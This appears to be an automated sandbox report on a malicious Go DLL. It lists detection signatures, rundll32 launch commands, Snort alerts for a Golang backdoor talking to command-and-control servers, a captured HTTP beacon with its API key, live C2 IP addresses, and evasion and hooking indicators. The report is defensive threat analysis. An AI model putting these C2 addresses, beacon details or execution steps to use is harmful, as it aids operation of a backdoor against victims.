Edit tour

Windows Analysis Report
file.dll

Overview

General Information

Sample name:	file.dll
Analysis ID:	1473486
MD5:	e6743e380f2418b616dca113dbbc93cb
SHA1:	6c051a6d3a183c24292d6821865a5a183b4ebb9c
SHA256:	eb7183f807b13b4524393b8da4cc242d96283a13ecd7331db1fcefd43986d0c9
Tags:	dll
Infos:

Detection

Score:	76
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Multi AV Scanner detection for submitted file

Snort IDS alert for network traffic

System process connects to network (likely due to code injection or exploit)

Found Tor onion address

Overwrites code with unconditional jumps - possibly settings hooks in foreign process

Switches to a custom stack to bypass stack traces

Checks if the current process is being debugged

Creates a process in suspended mode (likely to inject code)

Detected TCP or UDP traffic on non-standard ports

Entry point lies outside standard sections

IP address seen in connection with other malware

Internet Provider seen in connection with other malware

PE / OLE file has an invalid certificate

PE file contains more sections than normal

PE file contains sections with non-standard names

Queries the volume information (name, serial number etc) of a device

Sample execution stops while process was sleeping (likely an evasion)

Uses 32bit PE files

Classification

Process Tree

System is w10x64

loaddll32.exe (PID: 4128 cmdline: loaddll32.exe "C:\Users\user\Desktop\file.dll" MD5: 51E6071F9CBA48E79F10C84515AAE618)

conhost.exe (PID: 5824 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

cmd.exe (PID: 3500 cmdline: cmd.exe /C rundll32.exe "C:\Users\user\Desktop\file.dll",#1 MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)

rundll32.exe (PID: 1216 cmdline: rundll32.exe "C:\Users\user\Desktop\file.dll",#1 MD5: 889B99C52A60DD49227C5E485A016679)

rundll32.exe (PID: 6580 cmdline: rundll32.exe C:\Users\user\Desktop\file.dll,MainFunc MD5: 889B99C52A60DD49227C5E485A016679)

rundll32.exe (PID: 6292 cmdline: rundll32.exe C:\Users\user\Desktop\file.dll,_cgo_dummy_export MD5: 889B99C52A60DD49227C5E485A016679)

rundll32.exe (PID: 6516 cmdline: rundll32.exe "C:\Users\user\Desktop\file.dll",MainFunc MD5: 889B99C52A60DD49227C5E485A016679)

rundll32.exe (PID: 1276 cmdline: rundll32.exe "C:\Users\user\Desktop\file.dll",_cgo_dummy_export MD5: 889B99C52A60DD49227C5E485A016679)

cleanup

Snort Signatures

ETPRO TROJAN Unknown Golang Backdoor CnC Client Request M1 - Source IP: 192.168.2.5 - Destination IP: 185.231.155.234

Timestamp:	07/15/24-12:52:56.229033
SID:	2855536
Source Port:	49770
Destination Port:	20529
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN Unknown Golang Backdoor CnC Server Response M1 - Source IP: 185.231.155.234 - Destination IP: 192.168.2.5

Timestamp:	07/15/24-12:53:25.827998
SID:	2855538
Source Port:	20529
Destination Port:	49770
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN Unknown Golang Backdoor CnC Server Response M2 - Source IP: 185.231.155.234 - Destination IP: 192.168.2.5

Timestamp:	07/15/24-12:52:56.228835
SID:	2855539
Source Port:	20529
Destination Port:	49770
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN Unknown Golang Backdoor CnC Client Request M2 - Source IP: 192.168.2.5 - Destination IP: 185.231.155.234

Timestamp:	07/15/24-12:53:25.610445
SID:	2855537
Source Port:	49770
Destination Port:	20529
Protocol:	TCP
Classtype:	A Network Trojan was detected

HTTP traffic detected: POST / HTTP/1.1Host: 195.2.70.38User-Agent: Go-http-client/1.1Content-Length: 158X-Api-Key: 7MBMBL3aAccept-Encoding: gzipData Raw: 18 4d 1b 15 0c 15 2a 0b 4c 5c 4b 0a 53 5d 1d 0f 0f 37 19 04 16 57 06 1e 10 20 1d 54 1e 05 19 4d 42 44 19 15 0c 17 17 33 1a 02 11 01 0f 0b 0c 45 59 4d 0d 14 13 5f 50 01 3c 2c 4b 4b 41 1f 1c 09 11 1e 33 0e 1d 15 1e 08 11 0b 4c 5c 4b 1e 12 16 3d 05 10 53 29 4d 42 44 0b 12 0a 03 0a 30 0c 15 10 06 01 08 4b 5d 41 5f 1f 35 11 49 10 5d 16 55 1a 1e 00 4d 42 44 04 03 56 4d 54 44 51 5f 5a 0d 57 5f 0a 52 51 0e 58 56 0d 03 57 56 5c 54 5e 04 56 0a 5a 5e 5c 06 53 5e 58 50 5e 5e 41 12 Data Ascii: M*L\KS]7W TMBD3EYM_P<,KKA3L\K=S)MBD0K]A_5I]UMBDVMTDQ_ZW_RQXVWV\T^VZ^\S^XP^^A

Source: rundll32.exe, 00000007.00000002.3931954299.000000000D464000.00000004.00001000.00020000.00000000.sdmp, rundll32.exe, 00000007.00000002.3934146478.000000000D663000.00000004.00001000.00020000.00000000.sdmp, rundll32.exe, 00000007.00000002.3934146478.000000000D60C000.00000004.00001000.00020000.00000000.sdmp, rundll32.exe, 00000007.00000002.3931954299.000000000D414000.00000004.00001000.00020000.00000000.sdmp, rundll32.exe, 00000007.00000002.3931954299.000000000D45A000.00000004.00001000.00020000.00000000.sdmp, rundll32.exe, 00000007.00000002.3932978999.000000000D4BE000.00000004.00001000.00020000.00000000.sdmp, rundll32.exe, 00000007.00000002.3934146478.000000000D598000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://195.2.70.38
Source: rundll32.exe, 00000007.00000002.3934146478.000000000D598000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://195.2.70.38Go-http-client/1.1PM
Source: rundll32.exe, 00000004.00000002.3932131837.000000000D012000.00000004.00001000.00020000.00000000.sdmp, rundll32.exe, 00000005.00000002.3934227145.000000000D90C000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://195.2.70.38P
Source: rundll32.exe, 00000004.00000002.3932131837.000000000D140000.00000004.00001000.00020000.00000000.sdmp, rundll32.exe, 00000005.00000002.3932347032.000000000D808000.00000004.00001000.00020000.00000000.sdmp, rundll32.exe, 00000005.00000002.3934227145.000000000D90C000.00000004.00001000.00020000.00000000.sdmp, rundll32.exe, 00000007.00000002.3931954299.000000000D414000.00000004.00001000.00020000.00000000.sdmp, rundll32.exe, 00000007.00000002.3932978999.000000000D4BE000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://195.2.70.38PM
Source: rundll32.exe, 00000004.00000002.3932131837.000000000D012000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://195.2.70.38http://91.142.74.28G
Source: rundll32.exe, 00000005.00000002.3935276148.000000000DA06000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://195.2.70.38http://91.142.74.28http://77.238.229.6377.238.250.123:80
Source: rundll32.exe, 00000007.00000002.3931954299.000000000D45A000.00000004.00001000.00020000.00000000.sdmp, rundll32.exe, 00000007.00000002.3934146478.000000000D598000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://77.238.224.56
Source: rundll32.exe, 00000007.00000002.3931954299.000000000D414000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://77.238.224.56Go-http-client/1.1Go-http-client/1.1Go-http-client/1.1P
Source: rundll32.exe, 00000005.00000002.3932347032.000000000D808000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://77.238.224.56Go-http-client/1.1PM
Source: rundll32.exe, 00000004.00000002.3932131837.000000000D140000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://77.238.224.56Go-http-client/1.1http://77.238.229.6377.238.250.123:80Go-http-client/1.1If-Modi
Source: rundll32.exe, 00000004.00000002.3932131837.000000000D0A2000.00000004.00001000.00020000.00000000.sdmp, rundll32.exe, 00000005.00000002.3934227145.000000000D90C000.00000004.00001000.00020000.00000000.sdmp, rundll32.exe, 00000007.00000002.3934146478.000000000D598000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://77.238.224.56PM
Source: rundll32.exe, 00000005.00000002.3934857035.000000000D9AC000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://77.238.224.56http://77.238.229.6377.238.250.123:80185.231.155.234:205291P
Source: rundll32.exe, 00000004.00000002.3932131837.000000000D140000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://77.238.224.56http://91.142.74.28
Source: rundll32.exe, 00000007.00000002.3931954299.000000000D45A000.00000004.00001000.00020000.00000000.sdmp, rundll32.exe, 00000007.00000002.3932978999.000000000D4BE000.00000004.00001000.00020000.00000000.sdmp, rundll32.exe, 00000007.00000002.3934146478.000000000D598000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://77.238.229.63
Source: rundll32.exe, 00000004.00000002.3932131837.000000000D012000.00000004.00001000.00020000.00000000.sdmp, rundll32.exe, 00000005.00000002.3932347032.000000000D88C000.00000004.00001000.00020000.00000000.sdmp, rundll32.exe, 00000007.00000002.3932978999.000000000D4BE000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://77.238.229.6377.238.250.123:80
Source: rundll32.exe, 00000004.00000002.3935140896.000000000D20C000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://77.238.229.6377.238.250.123:80Go-http-client/1.1X-Content-Type-OptionsTransfer-Encodinghttp:/
Source: rundll32.exe, 00000007.00000002.3934146478.000000000D598000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://77.238.229.6377.238.250.123:80Go-http-client/1.1http://195.2.70.38Go-http-client/1.1http://91
Source: rundll32.exe, 00000004.00000002.3932131837.000000000D012000.00000004.00001000.00020000.00000000.sdmp, rundll32.exe, 00000004.00000002.3932131837.000000000D0A2000.00000004.00001000.00020000.00000000.sdmp, rundll32.exe, 00000005.00000002.3932347032.000000000D88C000.00000004.00001000.00020000.00000000.sdmp, rundll32.exe, 00000007.00000002.3932978999.000000000D4BE000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://77.238.229.6377.238.250.123:80PM
Source: rundll32.exe, 00000007.00000002.3934146478.000000000D60C000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://77.238.229.6377.238.250.123:80http://195.2.70.38http://91.142.74.28http://77.238.224.56PM
Source: rundll32.exe, 00000007.00000002.3934146478.000000000D60C000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://77.238.229.6377.238.250.123:80v
Source: rundll32.exe, 00000007.00000002.3931954299.000000000D464000.00000004.00001000.00020000.00000000.sdmp, rundll32.exe, 00000007.00000002.3934146478.000000000D663000.00000004.00001000.00020000.00000000.sdmp, rundll32.exe, 00000007.00000002.3931954299.000000000D45A000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://77.238.250.123
Source: rundll32.exe, 00000005.00000002.3932347032.000000000D8AE000.00000004.00001000.00020000.00000000.sdmp, rundll32.exe, 00000007.00000002.3932978999.000000000D4F0000.00000004.00001000.00020000.00000000.sdmp, rundll32.exe, 00000007.00000002.3931954299.000000000D464000.00000004.00001000.00020000.00000000.sdmp, rundll32.exe, 00000007.00000002.3934146478.000000000D663000.00000004.00001000.00020000.00000000.sdmp, rundll32.exe, 00000007.00000002.3931954299.000000000D45A000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://77.238.250.123http://195.2.70.38
Source: rundll32.exe, 00000007.00000002.3931954299.000000000D45A000.00000004.00001000.00020000.00000000.sdmp, rundll32.exe, 00000007.00000002.3932978999.000000000D4BE000.00000004.00001000.00020000.00000000.sdmp, rundll32.exe, 00000007.00000002.3934146478.000000000D598000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://91.142.74.28
Source: rundll32.exe, 00000007.00000002.3934146478.000000000D598000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://91.142.74.28Go-http-client/1.1http://77.238.224.56PM
Source: rundll32.exe, 00000007.00000002.3932978999.000000000D4BE000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://91.142.74.28N
Source: rundll32.exe, 00000004.00000002.3932131837.000000000D0A2000.00000004.00001000.00020000.00000000.sdmp, rundll32.exe, 00000005.00000002.3934227145.000000000D90C000.00000004.00001000.00020000.00000000.sdmp, rundll32.exe, 00000005.00000002.3932347032.000000000D88C000.00000004.00001000.00020000.00000000.sdmp, rundll32.exe, 00000007.00000002.3932978999.000000000D4BE000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://91.142.74.28PM
Source: rundll32.exe, 00000005.00000002.3935276148.000000000DA06000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://91.142.74.28http://77.238.224.56PM
Source: file.dll	String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0
Source: file.dll	String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
Source: file.dll	String found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2AssuredIDCodeSigningCA.crt0
Source: file.dll	String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
Source: file.dll	String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
Source: file.dll	String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
Source: file.dll	String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0O
Source: file.dll	String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
Source: file.dll	String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
Source: file.dll	String found in binary or memory: http://crl3.digicert.com/sha2-assured-cs-g1.crl05
Source: file.dll	String found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDRootCA.crl0:
Source: file.dll	String found in binary or memory: http://crl4.digicert.com/sha2-assured-cs-g1.crl0K
Source: file.dll	String found in binary or memory: http://ocsp.digicert.com0A
Source: file.dll	String found in binary or memory: http://ocsp.digicert.com0C
Source: file.dll	String found in binary or memory: http://ocsp.digicert.com0N
Source: file.dll	String found in binary or memory: http://ocsp.digicert.com0X
Source: file.dll	String found in binary or memory: http://www.digicert.com/CPS0
Source: file.dll	String found in binary or memory: https://www.digicert.com/CPS0

Source: file.dll

Static PE information: invalid certificate

Source: file.dll

Static PE information: Number of sections : 12 > 10

Source: file.dll

Static PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, DEBUG_STRIPPED, DLL

Source: classification engine

Classification label: mal76.evad.winDLL@14/1@0/6

Source: C:\Windows\SysWOW64\rundll32.exe

File created: C:\Users\user\AppData\Local\config

Jump to behavior

Source: C:\Windows\System32\conhost.exe

Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5824:120:WilError_03

Source: C:\Windows\System32\loaddll32.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: C:\Windows\SysWOW64\cmd.exe

Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\file.dll",#1

Source: file.dll

ReversingLabs: Detection: 13%

Source: unknown	Process created: C:\Windows\System32\loaddll32.exe loaddll32.exe "C:\Users\user\Desktop\file.dll"
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C rundll32.exe "C:\Users\user\Desktop\file.dll",#1
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\file.dll",#1
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\file.dll,MainFunc
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\file.dll,_cgo_dummy_export
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\file.dll",MainFunc
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\file.dll",_cgo_dummy_export
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C rundll32.exe "C:\Users\user\Desktop\file.dll",#1	Jump to behavior
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\file.dll,MainFunc	Jump to behavior
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\file.dll,_cgo_dummy_export	Jump to behavior
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\file.dll",MainFunc	Jump to behavior
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\file.dll",_cgo_dummy_export	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\file.dll",#1	Jump to behavior

Source: C:\Windows\System32\loaddll32.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Windows\System32\loaddll32.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\System32\loaddll32.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Windows\System32\loaddll32.exe	Section loaded: powrprof.dll	Jump to behavior
Source: C:\Windows\System32\loaddll32.exe	Section loaded: umpdc.dll	Jump to behavior
Source: C:\Windows\System32\loaddll32.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: apphelp.dll	Jump to behavior

Source: file.dll

Static PE information: Virtual size of .text is bigger than: 0x100000

Source: file.dll

Static PE information: Image base 0x6c2c0000 > 0x60000000

Source: file.dll

Static file information: File size 13860360 > 1048576

Source: file.dll

Static PE information: Raw size of .rdata2 is bigger than: 0x100000 < 0xd32a00

Source: file.dll

Static PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE

Source: initial sample

Static PE information: section where entry point is pointing to: .rdata2

Source: file.dll	Static PE information: section name: .rdata0
Source: file.dll	Static PE information: section name: .rdata1
Source: file.dll	Static PE information: section name: .rdata2

Hooking and other Techniques for Hiding and Protection

Overwrites code with unconditional jumps - possibly settings hooks in foreign process

Source: C:\Windows\System32\loaddll32.exe	Memory written: PID: 4128 base: 1420005 value: E9 8B 2F AD 75	Jump to behavior
Source: C:\Windows\System32\loaddll32.exe	Memory written: PID: 4128 base: 76EF2F90 value: E9 7A D0 52 8A	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Memory written: PID: 1216 base: 2B10005 value: E9 8B 2F 3E 74	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Memory written: PID: 1216 base: 76EF2F90 value: E9 7A D0 C1 8B	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Memory written: PID: 6580 base: 3350005 value: E9 8B 2F BA 73	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Memory written: PID: 6580 base: 76EF2F90 value: E9 7A D0 45 8C	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Memory written: PID: 6292 base: 23E0005 value: E9 8B 2F B1 74	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Memory written: PID: 6292 base: 76EF2F90 value: E9 7A D0 4E 8B	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Memory written: PID: 6516 base: 32F0005 value: E9 8B 2F C0 73	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Memory written: PID: 6516 base: 76EF2F90 value: E9 7A D0 3F 8C	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Memory written: PID: 1276 base: 2DA0005 value: E9 8B 2F 15 74	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Memory written: PID: 1276 base: 76EF2F90 value: E9 7A D0 EA 8B	Jump to behavior

Source: C:\Windows\System32\loaddll32.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion

Switches to a custom stack to bypass stack traces

Source: C:\Windows\System32\loaddll32.exe	API/Special instruction interceptor: Address: 6C7ED9ED
Source: C:\Windows\System32\loaddll32.exe	API/Special instruction interceptor: Address: 6BFB2765
Source: C:\Windows\System32\loaddll32.exe	API/Special instruction interceptor: Address: 6CB06499
Source: C:\Windows\System32\loaddll32.exe	API/Special instruction interceptor: Address: 6BF71233
Source: C:\Windows\System32\loaddll32.exe	API/Special instruction interceptor: Address: 6C7E93AF
Source: C:\Windows\System32\loaddll32.exe	API/Special instruction interceptor: Address: 6C16B08D
Source: C:\Windows\System32\loaddll32.exe	API/Special instruction interceptor: Address: 6CBDAB20
Source: C:\Windows\System32\loaddll32.exe	API/Special instruction interceptor: Address: 6BF5D226
Source: C:\Windows\System32\loaddll32.exe	API/Special instruction interceptor: Address: 6BF34C05
Source: C:\Windows\System32\loaddll32.exe	API/Special instruction interceptor: Address: 6C01770E
Source: C:\Windows\System32\loaddll32.exe	API/Special instruction interceptor: Address: 6BF846CE
Source: C:\Windows\System32\loaddll32.exe	API/Special instruction interceptor: Address: 6C1AF1A2

Source: C:\Windows\System32\conhost.exe

Last function: Thread delayed

Source: C:\Windows\System32\loaddll32.exe

Thread delayed: delay time: 120000

Jump to behavior

Source: rundll32.exe, 00000007.00000002.3931248896.0000000003076000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dlln
Source: loaddll32.exe, 00000000.00000002.3371698348.000000000145E000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000002.3931317266.0000000002B5A000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000002.3931346875.000000000337A000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000008.00000002.2199335619.0000000002FE9000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll

Source: C:\Windows\System32\loaddll32.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Windows\SysWOW64\rundll32.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process queried: DebugPort	Jump to behavior

HIPS / PFW / Operating System Protection Evasion

System process connects to network (likely due to code injection or exploit)

Source: C:\Windows\SysWOW64\rundll32.exe	Network Connect: 77.238.229.63 80	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Network Connect: 195.2.70.38 80	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Network Connect: 77.238.224.56 80	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Network Connect: 91.142.74.28 80	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Network Connect: 185.231.155.234 20529	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Network Connect: 77.238.250.123 80	Jump to behavior

Source: C:\Windows\SysWOW64\cmd.exe

Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\file.dll",#1

Jump to behavior

Source: C:\Windows\SysWOW64\rundll32.exe	Queries volume information: C:\Users\user\AppData\Local\config VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Queries volume information: C:\Users\user\AppData\Local\config VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Queries volume information: C:\Users\user\AppData\Local\config VolumeInformation	Jump to behavior

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	Windows Management Instrumentation	1 DLL Side-Loading	111 Process Injection	1 Masquerading	1 Credential API Hooking	111 Security Software Discovery	Remote Services	1 Credential API Hooking	1 Non-Standard Port	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	Scheduled Task/Job	Boot or Logon Initialization Scripts	1 DLL Side-Loading	11 Virtualization/Sandbox Evasion	LSASS Memory	1 Process Discovery	Remote Desktop Protocol	Data from Removable Media	1 Non-Application Layer Protocol	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	Logon Script (Windows)	Logon Script (Windows)	111 Process Injection	Security Account Manager	11 Virtualization/Sandbox Evasion	SMB/Windows Admin Shares	Data from Network Shared Drive	1 Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	Login Hook	1 Rundll32	NTDS	111 System Information Discovery	Distributed Component Object Model	Input Capture	1 Proxy	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	1 DLL Side-Loading	LSA Secrets	Internet Connection Discovery	SSH	Keylogging	Fallback Channels	Scheduled Transfer	Data Encrypted for Impact

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
file.dll	14%	ReversingLabs

Source	Detection	Scanner	Label
http://77.238.229.6377.238.250.123:80Go-http-client/1.1X-Content-Type-OptionsTransfer-Encodinghttp:/	0%	Avira URL Cloud	safe
http://77.238.224.56PM	0%	Avira URL Cloud	safe
http://77.238.229.6377.238.250.123:80Go-http-client/1.1http://195.2.70.38Go-http-client/1.1http://91	0%	Avira URL Cloud	safe
http://77.238.229.6377.238.250.123:80http://195.2.70.38http://91.142.74.28http://77.238.224.56PM	0%	Avira URL Cloud	safe
http://195.2.70.38PM	0%	Avira URL Cloud	safe
http://77.238.224.56http://77.238.229.6377.238.250.123:80185.231.155.234:205291P	0%	Avira URL Cloud	safe
http://77.238.229.6377.238.250.123:80PM	0%	Avira URL Cloud	safe
http://195.2.70.38http://91.142.74.28G	0%	Avira URL Cloud	safe
http://77.238.229.63/	0%	Avira URL Cloud	safe
http://77.238.224.56	0%	Avira URL Cloud	safe
http://77.238.224.56http://91.142.74.28	0%	Avira URL Cloud	safe
http://91.142.74.28http://77.238.224.56PM	0%	Avira URL Cloud	safe
http://77.238.224.56Go-http-client/1.1PM	0%	Avira URL Cloud	safe
http://195.2.70.38/	0%	Avira URL Cloud	safe
http://91.142.74.28N	0%	Avira URL Cloud	safe
http://77.238.250.123/	0%	Avira URL Cloud	safe
http://195.2.70.38http://91.142.74.28http://77.238.229.6377.238.250.123:80	0%	Avira URL Cloud	safe
http://77.238.224.56/	0%	Avira URL Cloud	safe
http://77.238.229.63	0%	Avira URL Cloud	safe
http://77.238.250.123	0%	Avira URL Cloud	safe
http://77.238.224.56Go-http-client/1.1Go-http-client/1.1Go-http-client/1.1P	0%	Avira URL Cloud	safe
http://91.142.74.28Go-http-client/1.1http://77.238.224.56PM	0%	Avira URL Cloud	safe
http://77.238.250.123http://195.2.70.38	0%	Avira URL Cloud	safe
http://77.238.224.56Go-http-client/1.1http://77.238.229.6377.238.250.123:80Go-http-client/1.1If-Modi	0%	Avira URL Cloud	safe
http://77.238.229.6377.238.250.123:80v	0%	Avira URL Cloud	safe
http://91.142.74.28PM	0%	Avira URL Cloud	safe
http://91.142.74.28/	0%	Avira URL Cloud	safe
http://77.238.229.6377.238.250.123:80	0%	Avira URL Cloud	safe
http://195.2.70.38Go-http-client/1.1PM	0%	Avira URL Cloud	safe
http://195.2.70.38P	0%	Avira URL Cloud	safe
http://91.142.74.28	0%	Avira URL Cloud	safe
http://195.2.70.38	0%	Avira URL Cloud	safe

Name	Malicious	Antivirus Detection	Reputation
http://77.238.229.63/	true	Avira URL Cloud: safe	unknown
http://195.2.70.38/	true	Avira URL Cloud: safe	unknown
http://77.238.250.123/	true	Avira URL Cloud: safe	unknown
http://77.238.224.56/	true	Avira URL Cloud: safe	unknown
http://91.142.74.28/	true	Avira URL Cloud: safe	unknown

URLs from Memory and Binaries

